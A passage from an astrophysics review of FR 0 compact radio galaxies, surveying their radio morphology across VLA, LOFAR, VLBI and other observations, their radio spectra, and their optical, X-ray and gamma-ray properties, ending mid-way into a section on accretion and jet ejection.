\(\sim\)4.5 times higher than that of FR Is and \(\sim\)100 than that of FR IIs. In relation to the luminosity function of ETGs, compact sources, consistent with a FR 0 morphology, are found in more than 60% of the giant (K-band magnitude \(\leq-25\)) ETGs detected by LOFAR with 150-MHz luminosity \(\geq 10^{21}\) W Hz\({}^{-1}\)(Capetti et al., 2022). ## 5 Radio properties The radio band uniquely characterises the FR 0s as RL CRSs which lack of substantial extended radio emission. In this section, we focus on the radio properties of FR 0s and RL CRSs in general. We provide an overview of the continuum observations from different telescopes at different frequencies (from 150 MHz to mm-band) and resolutions (from arcsec to milli-arcsec) to probe the physical mechanism acting at various linear scales along the putative jet. Most studies of CRSs which are reported in the next sub-sections, are related to low-\(z\) sources (unless explicited) and typically LERGs. ### Low resolution #### 5.1.1 GHz-band: sub/arcsec-scale with VLA For the large availability of shallow radio data in the band \(\sim\)1-5 GHz, the VLA has been the first telescope used to select and characterise the properties of FR 0s. In fact, for the large sky coverage, moderately high resolution and sensitivity, FIRST and NVSS 1.4-GHz surveys have been largely exploited to select CRSs and RGs in general in the local Universe, but other than these data the radio information was extremely limited. Later, follow-up VLA observations of 25 FR 0s at 1.4, 4.5, and 7.5 GHz revealed that two third still appear compact at the angular resolution of 0.3\({}^{\prime\prime}\) (a few hundreds of parsec) and with a flat radio spectrum in the GHz band (Baldi et al., 2015, 2019). Only a third of the sample exhibits twin or one-sided jets extended on a scale of \(\sim\)2-14 kpc (see Fig. 2 as an example). The apparent radio compactness of most FR 0s at kpc scales could be caused by the fact that jet emission is below the surface brightness limit of most large-scale radio surveys. In fact, Shabala et al. (2017) demonstrated that VLBI-scale compact AGN could have lobes and plumes too faint to be detected by most surveys with the VLA and LOFAR. The absence of substantial extended jet emission, whether due to observational effects (no sufficient sensitivity to detect diffuse jets on larger scales) or to intrinsic reasons (intermittent jet activity, young radio activity, intrinsic jet inefficiency, see Sect. 8 and 12), represents the characteristic feature of the FR 0 class and their uniqueness with respect to the other classes of RGs. Wide-area GHz-band surveys also revealed a large fraction of low-power CRSs, e.g., \(\sim\)93% in the VLA-COSMOS Large Project at 3 GHz (Bondi et al., 2018; Vardoulaki et al., 2021). These FR 0s candidates are associated with less massive hosts \(\sim 10^{10.8}\,M_{\odot}\), with lower radio powers (\(\lesssim 10^{22}\,{\rm W\,Hz}^{-1}\) \begin{table} \begin{tabular}{c c c c c c c c} \hline \(\log\)\(L_{\rm 1.4GHz}\) & FR0CAT & \multicolumn{2}{c}{sFRICAT} & FRICAT & FRIICAT \\ erg s\({}^{-1}\) & N & \(\log_{10}\)\(\rho\) & N & \(\log_{10}\)\(\rho\) & N & \(\log_{10}\)\(\rho\) & N & \(\log_{10}\)\(\rho\) \\ \hline 38.0–38.4 & 6 & \(-5.64^{+0.15}_{-0.23}\) & 0 & – & 0 & – & 0 & – \\ 38.4–38.8 & 27 & \(-5.55^{+0.08}_{-0.10}\) & 0 & – & 0 & – & 0 & – \\ 38.8–39.2 & 48 & \(-5.70^{+0.06}_{-0.07}\) & 1 & \(<-7.58^{+0.51}_{-0.51}\) & 0 & – & 0 & – \\ 39.2–39.6 & 14 & \(-6.84^{+0.10}_{-0.14}\) & 8 & \(-7.19^{+0.13}_{-0.20}\) & 3 & \(-7.82^{+0.24}_{-0.59}\) & 1 & \(<-9.86^{+0.51}_{-0.23}\) \\ 39.6–40.0 & 8 & \(-7.60^{+0.13}_{-0.19}\) & 4 & \(-8.13^{+0.20}_{-0.39}\) & 32 & \(-7.29^{+0.07}_{-0.09}\) & 7 & \(-9.39^{+0.15}_{-0.23}\) \\ 40.0–40.4 & 1 & \(<-9.97^{+0.51}_{-0.51}\) & 1 & \(<-9.60^{+0.51}_{-0.51}\) & 91 & \(-7.28^{+0.05}_{-0.05}\) & 19 & \(-9.54^{+0.10}_{-0.12}\) \\ 40.4–40.8 & 0 & – & 0 & – & 70 & \(-7.94^{+0.05}_{-0.06}\) & 36 & \(-9.82^{+0.07}_{-0.09}\) \\ 40.8–41.2 & 0 & – & 0 & – & 19 & \(-9.06^{+0.09}_{-0.12}\) & 34 & \(-10.39^{+0.07}_{-0.09}\) \\ 41.2–41.6 & 0 & – & 0 & – & 4 & \(-10.29^{+0.20}_{-0.39}\) & 16 & \(-11.40^{+0.10}_{-0.13}\) \\ 41.6–42.0 & 0 & – & 0 & – & 0 & – & 9 & \(-12.23^{+0.13}_{-0.19}\) \\ 42.0–42.4 & 0 & – & 0 & – & 0 & – & 1 & \(<-13.52^{+0.51}_{-0.51}\) \\ \hline \end{tabular} \end{table} Table 2: The local NVSS radio luminosity functions at 1.4 GHz for FR0CAT, sFRICAT, FRICAT and FRIICAT (LERG) sources. The first column shows the range of 1.4 GHz radio luminosities (erg s\({}^{-1}\)) considered in each bin. The \(N\) columns give the total number of radio sources and \(\log_{10}\)\(\rho\) their space density (number per \(\log_{10}L\) per Mpc\({}^{3}\), see Fig. 5). and at higher redshifts (median \(z\sim 1.0\)) than the FR0CAT sources. In the Very Large Array Sky Survey (VLASS; Lacy et al. 2020) at 3 GHz, Nyland et al. (2020) selected \(\sim\)2000 compact RGs, but the redshift information is not well characterised for the entire sample. The selected CRSs in these surveys consists of a heterogeneous population of AGN with red and blue colours, consistent with genuine FR 0s, star-forming galaxies, RQAGN and blazars. Furthermore, Koziel-Wierzbowska et al. (2020) found that \(\sim\)90% of the optical SDSS galaxies at \(z<0.5\) with a FIRST counterpart appear compact with \(L_{1.4\,\rm GHz}\sim 10^{21}\) - \(10^{26}\) W Hz\({}^{-1}\), hosted typically by ellipticals, a similar result to the work by Baldi and Capetti (2010). Other GHz-band studies on core-dominated LINERs with moderate radio-loudness hosted in ETGs (e.g. Nagar et al. 2000; Filho et al. 2000, 2002; Verdoes Kleijn et al. 2002; Filho et al. 2004; Kharb et al. 2012; Singh et al. 2015; Dullo et al. 2018; Zajacek et al. 2019; Singh et al. 2019) strengthen the result that nearby elliptical galaxies tend to power RL LLAGN with galactic-scale jet structures, in analogy to FR 0 galaxies. #### 5.1.2 High-frequency up to mm-band Interferometric observations at \(\nu\gtrsim 5\) GHz have the advantage of isolating better the compact optically-thick flat-spectrum core. In fact, at high frequencies the Australia Telescope Compact Array (ATCA) played an important role in the early studies of FR 0s. Sadler et al. (2014) have cross-matched the Australia Telescope 20 GHz (AT20G) Survey with the optical spectroscopic 6dF Galaxy Survey (6dFGS; Jones et al. 2009) to produce a volume-limited sample of 202 high-frequency CRSs associated with local galaxies (at a median \(z\sim 0.06\)) with 20-GHz flux density limit of 40 mJy. The angular resolution 10--15\({}^{\prime\prime}\) corresponds to a projected linear size of 10-15 kpc. Chhetri et al. (2013) used data from the longest (6 km) ATCA baseline to determine how much of the radio emission seen by the AT20G survey arose in very compact components. They showed that generally almost all their 20 GHz radio emission comes from a central source \(\lesssim 0.2^{\prime\prime}\) and almost half of the AT20G sources have flat radio spectra at 1--20 GHz. The selected FR 0s represent the dominant population (\(\sim\)70--75%) of the AT20G-6dFGS catalogue at radio powers between \(\sim\)10\({}^{22}\) and 10\({}^{26}\) W Hz\({}^{-1}\) in the local Universe. In addition, the high-frequency selected FR 0s consist of a heterogeneous population in terms of both optical AGN types (75% LERGs, 25% HERGs) and host galaxy types (67% ETGs, 33% LTGs). Further studies of these 20-GHz CRSs confirmed that the flat-spectrum AT20G objects sources tend to preserve a similar spectral shape in polarisation and are hosted in bluer galaxies than standard ETGs (Chhetri et al., 2012, 2020; Massardi et al., 2011). Whittam et al. (2016) and Whittam et al. (2020) selected a complete sample of 96 faint (\(>0.5\) mJy) RGs from the Tenth Cambridge (10C) survey at 15.7 GHz including LERGs and HERGs, mostly, within \(z\sim 3\). Sixty-five sources are unresolved in the 610-MHz GMRT radio observations, placing an upper limit on their angular size of \(\sim 2^{\prime\prime}\). The majority of these sources have flat spectra and are core dominated. The selected FR 0 population is the most abundant in the subset of sources with 15.7-GHz flux densities \(<\)1 mJy, extending the results of Sadler et al. (2014) at higher redshifts, \(z\sim 1\). Baldi et al. (in preparation) observed 25 FR0CAT sources at 15 GHz with the Arcminute Microkelvin Imager (AMI) telescope with an angular resolution of \(\sim 30^{\prime\prime}\), previously observed with VLA by Baldi et al. (2015) and Baldi et al. (2019). The sources appear all unresolved and extend the spectral flatness of the FR0CAT SED at higher frequencies. Mikhailov and Sotnikova (2021, 2021) conducted quasi-simultaneous radio observations of 34 FR 0s up to 22.3 GHz with the single-dish radio telescope RATAN-600 operating in transit mode with resolution varying from 11 to \(80^{\prime\prime}\). Quasi-simultaneous spectra in the range 2 - 8.2 GHz are generally flat (\(\alpha<0.5\)), but with a larger spread in the spectral index at higher frequencies. The key result is that some FR 0s demonstrate a variability level of up to 25% on a time scale of 1 year. In the mm-band, a systematic study of FR 0s is still missing. Nevertheless, first studies on mm-band continuum observations of a sample of nearby ETGs and LLAGN found compact nuclear emission (on a scale 3-7\({}^{\prime\prime}\)), showing flat or inverted spectra consistent with the scenario of small jets powered by RIAF discs (e.g. Doi et al., 2011; Marti-Vidal and Muller, 2017; Chen et al., 2023). ALMA continuum observations of bright CRSs (Bonato et al., 2018, 2019; Kawamuro et al., 2022) reveal the presence of a minor population of flat-spectrum radio sources (possibly similar to FR 0s) in opposition to the abundant class of blazars. #### 5.1.3 Low frequency Low-frequency observations (\(<1\) GHz) have the advantage of probing the synchrotron-aged plasma and the optically-thin emission from an extended diffuse jet, crucial to test the duty cycles of FR 0s. Using the data release of the TIFR (Tata Institute of Fundamental Research) GMRT Sky Survey (TGSS), Capetti et al. (2019) studied the low-frequency properties of 43 FR 0 galaxies (FR0CAT, with 150-MHz flux densities \(>\) 17.5 mJy) at 150 MHz at a resolution of \(\sim 25^{\prime\prime}\) (corresponding to 10 and 25 kpc). No extended emission has been detected around the detected FR 0s, corresponding to a luminosity limit of \(\lesssim 4\times 10^{23}\) W Hz\({}^{-1}\) over an area of 100 kpc \(\times\) 100 kpc. The majority of the FR 0s have a flat or inverted SED (150 MHz - 1.4 GHz, \(\alpha<0.5\)): this spectral behavior confirms the general paucity of optically thin extended emission within the TGSS beam. By focusing on a sub-sample of FR 0s with 1.4-GHz flux densities \(>50\) mJy and including 5-GHz data from the Green Bank survey (Gregory et al., 1996), the authors found that \(\sim\)75% of them have a slightly convex radio spectrum, with a smaller curvature than powerful GPS sources. The typical FR 0 radio spectrum is better described by a gradual steepening toward high frequencies, rather than a transition from an optically-thick to an optically-thin regime as seen in young RGs. Dedicated deep radio surveys on well-studied fields, such as ELIAS-N1, have also detected large numbers of compact RGs: GMRT observations at 610 MHz (Ishwara-Chandra et al., 2020) and 325 MHz (Sirothia et al., 2009) found CRSs with a median spectral index of \(\sim\)0.85 between 610 and 1400 MHz (Ishwara-Chandra et al., 2020). The flat-spectrum sources, which are expected to be core-dominated, represent the FR 0 candidates. The vast majority, \(\sim\)70%, of the radio sources in the LOFAR Two-metre Sky Survey (LoTSS, Shimwell et al. 2017, 2019; Hardcastle et al. 2019) appear compact at 150 MHz with 6'' resolution, consistent with a FR 0 classification. Capetti et al. (2020) explored in details the LOFAR properties of the FR0CAT sources. Most of the objects still appear point-like structures with sizes of \(\lesssim\)3-6 kpc. However, \(\sim\)18% of the FR 0s present resolved emission of low surface brightness, usually with a jetted morphology extending between 15 and 50 kpc. No extended emission is detected around the rest of FR 0s, with a typical luminosity limit of \(\sim 5\times 10^{22}\,\mathrm{W\,Hz}^{-1}\) over an area of 100 kpc \(\times\) 100 kpc. The spectral slopes of FR 0s between 150 MHz and 1.4 GHz span a broad range (\(-0.7\lesssim\alpha\lesssim 0.8\)) with a median value of \(\alpha\sim 0.1\); only 20% of them have a steep spectrum (\(\alpha\gtrsim 0.5\)), which is an indication of the presence of diffuse emission confined within the spatial resolution limit. The fraction of FR 0s showing evidence for the presence of jets, by including both spectral and morphological information, is \(\sim\)40%. In conclusion, the GMRT and LOFAR study of the FR 0s corroborates the result on the absence of extended emission in most of the sources, even in the few hundred MHz regime, where optically-thin jet emission is expected to dominate over the core component, as seen in classical large-scale RLAGN. Figure 6: EVN image at 5 GHz, spectral index map and jet proper motions of one FR 0 from Cheng et al. (2021) from left to right panel. The grey-coloured ellipse in the bottom-left corner of each panel denotes the restoring beam. The spectral index maps (spectral index colour coded in the left palette) are obtained by using the EVN 5 and 8 GHz data. The proper motions of jet components are determined by the linear fit to the component positions as a function of time. Images reproduced with permission from Cheng et al. (2021), copyright by the author(s). ### High resolution The VLBI technique enables to access to the pc-scale radio emission, a crucial region to study the jet properties of FR 0s closer to the launching site. Cheng and An (2018) and Cheng et al. (2021) studied a sample of FR 0s with worldwide VLBI, the American Very Long Baseline Array (VLBA) and European VLBI Network (EVN) and found resolved jets of a few pc for \(\sim\)80% of the sample (Cheng and An, 2018; Cheng et al., 2021) (see Fig. 6 as an example). The VLBI multi-epoch data and the symmetry of the radio structures indicate that the jet bulk speeds are mildly relativistic (between 0.08\(c\) and 0.51\(c\)) with low bulk Lorentz factors (between 1.7 and 6) and large viewing angles. However, these VLBI-based studies focused on particularly bright FR 0s (flux densities \(>\) 50 mJy, a factor 10 higher than the typical FR0CAT flux selection threshold, Baldi et al. 2018) with radio power 10\({}^{23}\) - 10\({}^{24}\) W Hz\({}^{-1}\). Recent VLBI studies also target less luminous FR 0s. Giovannini et al. (2023) studied pc-scale emission of 18 FR0CAT objects observed with the VLBA at 1.5 and 5 GHz and/or with the EVN at 1.7 GHz with flux densities a factor several lower than those of the FR 0s studied by Cheng and An (2018) and Cheng et al. (2021). All sources have been detected but one with radio core power down to 10\({}^{21}\) W Hz\({}^{-1}\). Four sources remain unresolved at pc scale, while highly-symmetric jets have been detected in all other sources. High-resolution observations carried out with the eMERLIN UK-wide array for a sample of 5 FR 0s at 5 GHz, reaching a resolution of \(\sim\)40 mas show sub-mJy core components (Baldi et al., 2021). The pc-scale core emission contributes, on average, to 3-6% of the total radio emission measured at kpc scale from NVSS maps, although an increasing core contribution for flat/inverted-spectrum sources is evident. VLBI studies of FR 0s clearly demonstrate the jet-to-counter-jet flux ratios of FR 0s are significantly smaller that those of 3C/FR Is (Baldi et al., 2021; Giovannini et al., 2023), supporting the picture that jet bulk velocities in the FR 0s are lower (see Sect. 8 for further discussion). Apart from the cases (\(\sim\)30%) where the VLBI core emission is higher than previous low-resolution data, possibly due to source variability and/or an inverted/peculiar radio spectrum, mas-scale radio emission is typically up to half of arcsec-scale core emission unresolved with VLA (Cheng and An, 2018; Cheng et al., 2021; Baldi et al., 2021; Giovannini et al., 2023). This suggests that a large fraction of emission is missed by moving from kpc to pc scale emission. Baldi et al. (2021) combined, for the first time, the visibility datasets of the eMERLIN and VLA in the same band for five low-power FR 0s (Baldi et al., 2015) in order to probe the intermediate scales of the jet length. This procedure turned out to be successful in detecting pc-scale jets for 4 objects, which were missing in the two original datasets (see Fig. 7 for an example) because unresolved in VLA maps and resolved out in the eMERLIN maps. We can thus conclude that FR 0s, although apparently lacking extended emissions, are effectively able to emanate pc-scale jets, whose both small size and low brightness make them hard to isolate and detect. The combination of long and short baselines represents a powerful tool to study the jet properties of the FR 0 population. In conclusion, VLBI studies of FR 0s reveal the presence of pc-scale jets, generally more symmetric than those of FR Is, flowing with mildly relativistic jet bulk speeds. These results are in line with VLBI observations of nearby low-power LINERs (e.g. Ulvestad and Ho 2001b; Falcke et al. 2000; Filho et al. 2002a; Nagar et al. 2002a). ### Radio SED To reconstruct the typical broad-band radio SED of a FR 0, we collect the multi-frequency radio data from MHz to GHz for the FR0CAT objects, available from low and high frequency surveys and single dish observations. Figure 8 depicts the mean radio SED (black solid line) from 150 MHz to 22 GHz with \(1\sigma\) dispersion (considering only detections). The main result is the overall flat spectral index (\(-0.011<\alpha<0.025\)), which confirms the general tendency of FR 0 population to be characterised by the lack of optically-thin component throughout the frequencies. The mean FR0 radio SED is flatter than the typical one derived for classical RLAGN, \(\sim-0.6\) - \(-0.7\) (Elvis et al., 1994), even selecting the low-z sample of RLAGN (Shang et al., 2011). Non-thermal self-absorbed synchrotron emission from the basis of a core-dominated jet is most probably responsible to justify the observed spectral flatness. At higher resolution, the (GHz-band) radio SED of the pc-scale cores is as flat as those derived from low-resolution radio observations (Fig. 6, Cheng and An 2018; Cheng et al. 2021). The jet components resolved with VLBI appear weak and have steeper spectra than those of cores, \(\sim-1\) - \(-2\). This Figure 7: The 5-GHz map of the one FR 0 (J2336+0004) observed with the eMERLIN array (resolution \(\sim\)40 mas) and its 4.9-GHz map (resolution \(\sim\)60 mas), obtained by combining eMERLIN and VLA visibilities. The filled area, shown at the bottom-left corner of the images, represents the restoring beam of the maps. Images reproduced from Baldi et al. (2021a), copyright by the author(s). result confirms the small contribution of the extended optically-thin jetted emission to the total radio emission in FR 0s (i.e. high core dominance) and, indeed, sub-kpc scale jets can typically emerge from radio maps with hybrid angular resolution (e.g., combining short and long baselines) or with deep VLBI observations. ## 6 Optical and infrared properties In the optical band, the continuum and spectral information of genuine FR 0s is mostly limited to the SDSS data. For the FR0CAT host galaxies, the optical absolute magnitude distribution covers the range \(-21\lesssim M_{\rm r}\lesssim-23\), corresponding to masses \(\sim 10^{10-11}\,M_{\odot}\), consistent with massive ETGs, as also inferred from the infrared colours. Instead, from the nuclear point of view, a study of the optical and IR accretion-related emission of FR 0s, in analogy to what has been done with Hubble Space Telescope for nearby 3C/FR Is (Chiaberge et al., 1999; Baldi et al., 2010), is still missing. The lack of a proper optical nuclear power estimate leads to the assumption of the optical galaxy emission as upper limit on the optical AGN. Considering 5 mJy as radio flux cut from the FR0CAT sample, the radio-loudness parameter of the FR0CAT sources is at least \(>11\). Figure 8: The mean radio spectra (L\({}_{\nu}\) vs \(\nu\)) of FR 0s from the FR0CAT (Baldi et al., 2018) from 150 MHz to 22.3 GHz. The data are taken: 150 MHz from Capetti et al. (2019, 2020a); 1.4 GHz from FIRST survey (Becker et al., 1995), 4.5–5 GHz from VLA data (Baldi et al., 2019a) and Green Bank 6-cm survey (GB6, Gregory et al. 1996); 7.5–8.2 GHz from VLA (Baldi et al., 2019a) and RATAN-600 telescope (Mikhailov and Sotnikova, 2021b); 11.2 and 22.3 GHz from RATAN-600 telescope (Mikhailov and Sotnikova, 2021b). The colour filled area represents the 1 \(\sigma\) distribution of the population. The numbers show the spectral indices in the 5 frequency segments (L\({}_{\nu}\sim\nu^{\alpha}\)) and are all consistent with a flat spectrum. An optical-band quantity which is widely used to characterise the AGN emission is the [O III]\(\lambda\)5007 emission line, that is produced by continuum radiation from the accretion disc or jet which photoionises and heats the ambient gas. Since it is easily observed and largely available from SDSS spectra, its luminosity is usually used as a proxy of the bolometric AGN power (Heckman et al., 2004) (see Sect. 8 for details and caveats). While the line luminosities of FR 0s do not correlate with the total radio luminosities in analogy to CoreG, but in opposition to classical RLAGN (upper panel, Fig. 9), they do with the radio core luminosities, once the sub-arcsec core emission is resolved. In fact, FR 0s lie on the radio-line correlation valid for FR Is and CoreG (Baldi et al., 2019). Figure 9: Upper panel: NVSS vs. [O III] line luminosity (erg s\({}^{-1}\)). The small points correspond to the SDSS/NVSS sample selected by Best and Heckman (2012). The solid line represents the correlation between line and radio luminosity derived for the 3C/FR I sample (green stars) (Baldi et al., 2019). The dotted lines include the region where RQAGN (Seyferts) are found. The filled circles are FR 0s studied with the VLA by Baldi et al. (2019) and the empty pink triangles are the CoreG. Lower panel: VLA radio core (5 GHz) vs [O III] line luminosity (erg s\({}^{-1}\)) for 3C/FR Is, FR 0s and CoreG and the dashed line represents their common radio-optical luminosity correlation. 2015, 2019a) (lower panel, Fig. 9). This common core-[O III] relation valid for LERG-type RGs (FR 0s, FR Is, FR IIs) is generally interpreted as measurement of non-thermal radiation from the jet base at different bands (see Sect. 8, e.g. Hardcastle and Worrall 2000; Baldi et al. 2019a). Since [O III] line is mostly isotropic, this shared correlation implies that the radio compactness of FR 0-like RGs is not due to geometric effects and also sets an universal accretion-ejection coupling at the nuclear level for all LERG-type RGs. Similarly, Miraghaei and Best (2017) found that compact RGs have \(L_{\rm[O~{}III]}\) distribution analogous to that of extended RGs, \(10^{39}\)-\(10^{40}\,\rm erg\,s^{-1}\), when matched in radio core luminosities. Conversely, the total radio luminosity of the FR 0s and CoreG does not scale with AGN bolometric luminosity, as, instead, it is valid for LERG FR I and FR IIs (Buttiglione et al., 2010), but a strong deficit of total radio emission with respect to the 3C/FR Is (not due to orientation), by a factor 100-1000 lower at the same AGN power, is notable. This shortage of total jet power suggests a lower jet efficiency of FR 0s than that of the other RLAGN classes (see Sect. 8 for a deeper discussion). The high detection rates of optical and IR nuclei and the lack of evidence for thermal emission at IR wavelengths have been interpreted as the absence of a dusty torus in 3C/FR Is and generally for LERGs (e.g Chiaberge et al. 1999; Leipski et al. 2009; Baldi and Capetti 2010; van der Wolk et al. 2010; Antonucci 2012; Dicken et al. 2014; Tadhunter 2016a). This scenario has also been applied to LINER-like LLAGN in general (FR 0s included), which find similar optical and IR characteristics of FR Is (e.g. Ho 2008; Muller-Sanchez et al. 2013), consistent with a luminosity-dependent model of a torus that disappears at very low accretion rates (Elitzur and Shlosman, 2006; Balmaverde and Capetti, 2015; Gonzalez-Martin et al., 2015). ## 7 High-energy properties The study of high-energy (HE, \(>\)0.1 keV) properties of jetted AGN can help to investigate the accretion and ejection mechanisms in action. The current and upcoming generations of HE detectors are revolutionising our picture of how the engines at the center of the RLAGN are able to launch plasma at relativistic speeds and extend their spectra to very-high energies (up to TeV, Rani 2019; Rulten 2022). In addition, the detection of HE emission and neutrinos associated with low-luminosity, misaligned AGN and BL Lacs (e.g., Abdo et al. 2010; IceCube Collaboration et al. 2018, 2022; Torresi 2020) has opened a new window on the physics of particle accelerations and jets even in AGN with less extreme conditions than that expected in powerful blazars. FR 0s, \(\sim\)4.5 times more numerous than FR Is in the local Universe (\(z<0.05\)), represent potentially interesting targets at high and very-high energies (from X-ray to TeV) and could make a non-negligible contribution to the extragalactic HE background (Stecker et al., 2019). Here we discuss the HE properties (from keV to TeV) of FR 0s, in analogy with the review by Baldi et al. (2019c). ### X-ray The X-ray emission represents an optimal proxy to study the accretion properties of active BHs, because the keV band can probe the HE photons produced by the corona and disc. Torresi et al. (2018) performed the first systematic study in the X-ray (2-10 keV) band of a sample of 19 nearby FR 0s selected from Best and Heckman (2012), for which X-ray data were available in the public archives of the _XMM-Newton_, _Chandra_ and _Swift_ satellites. Their FIRST 1.4-GHz flux densities (\(>\)30 mJy) are higher than those of the FR0_CAT_ sources. Torresi et al. (2018) found that the X-ray spectra of these FR 0s are generally well represented by a power-law \(\Gamma\sim\) 1.9 absorbed by Galactic column density and do not require an additional intrinsic absorber, confirming the optical-IR results on the absence of a dusty torus, similar to 3C/FR Is (e.g. Donato et al., 2004; Balmaverde et al., 2006). In some cases, the addition of a thermal component is required by the data: this soft X-ray emission could be related to the extended intergalactic medium or to the hot corona typical of nearby ETGs (Fabbiano et al., 1992). The X-ray luminosities of FR 0s, \(L_{\rm X}\), range between \(10^{40}\) and \(10^{43}\) erg s\({}^{-1}\), similar to those of 3C/FR Is (Balmaverde et al., 2006; Hardcastle and Worrall, 2000). When the X-ray luminosity is compared to that of the radio core, a statistically significant correlation is established (Fig. 10), valid for FR Is and FR 0s. This result corroborates the common interpretation that the X-ray emission in low-power RGs, FR 0s, FR Is and LERGs in general, has a non-thermal origin Figure 10: X-ray (2–10 keV) luminosity versus 5-GHz radio core luminosity for FR 0s (black circles) from SDSS/NVSS sample and 3C/FR Is (red squares). Arrows indicate upper limits. The black solid line is the linear regression for the overall sample of FR 0s and FR Is, excluding the upper limits. The black dashed lines represent the 1\(\sigma\) uncertainties on the slope. Image reproduced with permission from Torresi et al. (2018), copyright by the author(s). from the jet (e.g. Balmaverde and Capetti 2006b; Hardcastle and Worrall 2000; Hardcastle et al. 2009). The X-ray luminosities of FR 0s also support the idea that the central engine of FR 0s is powered by a sub-Eddington RIAF-type disc, \(\dot{L}_{E}\sim 10^{-3}\) - \(10^{-5}\), analogous to 3C/FR Is and different from powerful 3C/FR IIs (HERGs) (Baum et al., 1995; Evans et al., 2006; Hardcastle et al., 2009). Since the study from Torresi et al. (2018) is slightly biased towards high-luminous FR 0s, a dedicated study of the accretion properties with deep Chandra data would be required for a statistical confirmation. ### Gamma-ray Gamma rays (\(>100\) keV) are generally produced under extreme relativistic conditions and offer a unique view of the physical mechanisms in jet launching and propagation (Blandford et al., 2019; Hada, 2019). In such a band, blazars are known to be the most luminous class of \(\gamma\)-ray emitters and have been thoroughly studied (Abdollahi et al., 2022). Conversely, the HE properties of low-luminosity and misaligned AGN are generally less explored than their luminous counterparts, because of their lower flux densities (Abdo et al., 2010; Angioni et al., 2017; Rieger and Levinson, 2018; de Menezes et al., 2020). In fact, there are only a few cases of \(\gamma\)-ray detection of FR 0s in literature. Grandi et al. (2016) claimed the first Fermi \(\gamma\)-ray detection of a FR 0, Tol 1326-379, with a GeV luminosity of \(2\times 10^{42}\) erg s\({}^{-1}\), similar to FR Is. Its radio-GeV SED is double-peaked (Maraschi et al., 1992), similar to other Figure 11: Multi-band SED (from radio to \(\gamma\)-ray) of the Fermi-detected FR 0, Tol 1326-379 (red symbols) compared to those of two nearby prototype FR Is, HE emitters: Cen A (green) and M 87 (blue). The dotted lines are polynomial functions connecting the data-points and do not represent model fits to data. Image reproduced with permission from Grandi et al. (2016), copyright by the author(s). jet-dominated RLAGN (Fig. 11, see the SEDs of M87, Abdo et al. 2009, and Cen A, H.E.S.S. Collaboration et al. 2020), where non-thermal synchrotron and inverse-Compton emission dominate in any band over the disc and host emission. While the GeV luminosity reconciles with the detection of local FR Is, the prominent Compton peak, brighter than the synchrotron one, makes this source similar to flat-spectrum radio quasars, while the steep \(\gamma\)-ray spectrum makes it conversely more similar to low-luminosity BL Lacs. Nevertheless, the best scenario which can reproduce the whole SED is a misaligned RG which emits synchrotron and synchrotron self-Compton radiation with a total energy flux of the order of a few \(10^{44}\,\mathrm{erg\,s^{-1}}\)(Grandi et al., 2016). Later, Paliya (2021) reports the \(\gamma\)-ray identification of the other three FR 0s from the FR0CAT above 1 GeV using more than a decade of the Fermi Large Area Telescope (LAT) observations. By stacking present large datasets, other FR 0 candidates and compact core-dominated RGs have been recently claimed to be detected (Best and Bazo, 2019; de Menezes et al., 2020). In addition, based on the sensitivities of upcoming MeV-TeV telescopes, a significant population of low luminosity-RGs emitting at HE will be unearthed in the near future (Baldi et al., 2019; Balmaverde et al., 2020). In fact, it has been estimated that nearby core-dominated RGs (FR0 s and CoreG) can account for \(\sim\)4%-18% of the unresolved \(\gamma\)-ray background below 50 GeV observed by the LAT instrument on-board _Fermi_(Stecker et al., 2019; Harvey et al., 2020). Unfortunately, no evident FR 0s have been listed among the non-blazar AGN list in the recently released Fourth LAT AGN Catalog (4LAC, Abdollahi et al. 2020; Ajello et al. 2022) and the \(\gamma\)-ray identification of Tol 1326-379 has also been questioned (Fu et al., 2022). In addition, Tavecchio et al. (2018) proposed that FR 0s can accelerate HE protons in the jet and be powerful enough to sustain the neutrino production detectable by the IceCube experiment, above several tens of TeV (Jacobsen et al., 2015). Merten et al. (2021, 2022) argued that FR0 jets can generate ultra-high-energy cosmic rays through stochastic shear acceleration up to \(\sim 10^{18}\) - \(10^{19}\) eV (Lundquist et al., 2022). In opposition, Mbarek and Caprioli (2021) argued that the lower bulk Lorentz factors of FR0 jets than those of FR I/IIs could disfavour their HE emission in general. In conclusions, although HE studies on FR 0s are still sparse, the main result is that FR 0s and FR Is share common X-ray and \(\gamma\)-ray properties, suggesting similar generic accretion and ejection phenomena in the vicinity of the BH (e.g. accretion disc properties and relativistic acceleration of particles at GeV energies in the jet). ## 8 Accretion and ejection Current magneto-hydrodynamic simulations have produced a wide range of accretion discs coupled with jets (e.g., Meier et al. 2001; Ohsuga et al. 2009; Yuan and Narayan 2014). In the low-accretion regime (where \(\dot{L}_{\rm E}\) is typically less than 2% of the Eddington limit, Heckman and Best 2014), ADAF discs are akin to launch jets (Narayan and Yi, 1995). An ADAF system can evolve under standard and normal evolution (SANE, e.g. Narayan et al. 2012) and magnetically arrested disc (MAD, e.g. Bisnovatyi-Kogan and Ruzmaikin 1974; Narayan et al. 2003; Tchekhovskoy et al. 2011) configurations: in the former the disc is not significantly threaded with poloidal magnetic flux, while in the latter the magnetic flux threading the BH horizon becomes so large that the magnetic pressure of the jet can temporarily stop the flow of matter into the BH. Current interest in MAD accretion is driven by the discovery that it leads to low and powerful relativistic jets. In fact, for M87, only strongly magnetized (MAD) disc models remain the most favourable solutions to reproduce the EHT results (e.g. Event Horizon Telescope Collaboration et al. 2021). This result strengthens the common interpretation that low-power RGs (generally FR Is, such as M 87) are probably powered by ADAF (MAD-type?) discs with low \(\dot{m}\) and low radiative efficiencies, which channel a small fraction of the disc plasma into the relativistic jet (e.g., Nagar et al. 2000; Falcke et al. 2000; Ho 2002; Hardcastle and Worrall 2000; Balmaverde and Capetti 2006a; Zanni et al. 2007; Ho 2008; Balmaverde et al. 2008; Hardcastle et al. 2009). To study the accretion and ejection characteristics of low-power RGs, broad-band empirical relations have been used to gauge the disc and jet energetics. For the accretion-related argument, we must rely on various proxies for the bolometric AGN luminosity based on the radiation that is not fully obscured by the torus and escapes or is reprocessed. For its large availability, the radiative bolometric luminosity or accretion power can be estimated from the optical [O III] emission line, L\({}_{\rm Bol}\) = 3500 L\({}_{\rm[O~{}III]}\) (for LLAGN, Heckman et al. 2004), as the AGN emission excites the gas clouds in the narrow line region, which re-emit [O III] line almost isotropically. This quantity is a good, but not optimal, proxy since internal obscuration and stellar contamination can affect the measurement. L\({}_{\rm[O~{}III]}\) represents an upper limit on the accretion power for jet-dominated AGN, LERGs (generally not affected by nuclear dust obscuration), where jet shocks can cause [O III] emission, instead of the underluminous RIAF disc (Capetti et al., 2005). The AGN jets are observable through their synchrotron emission. The mechanical (kinetic) power of the 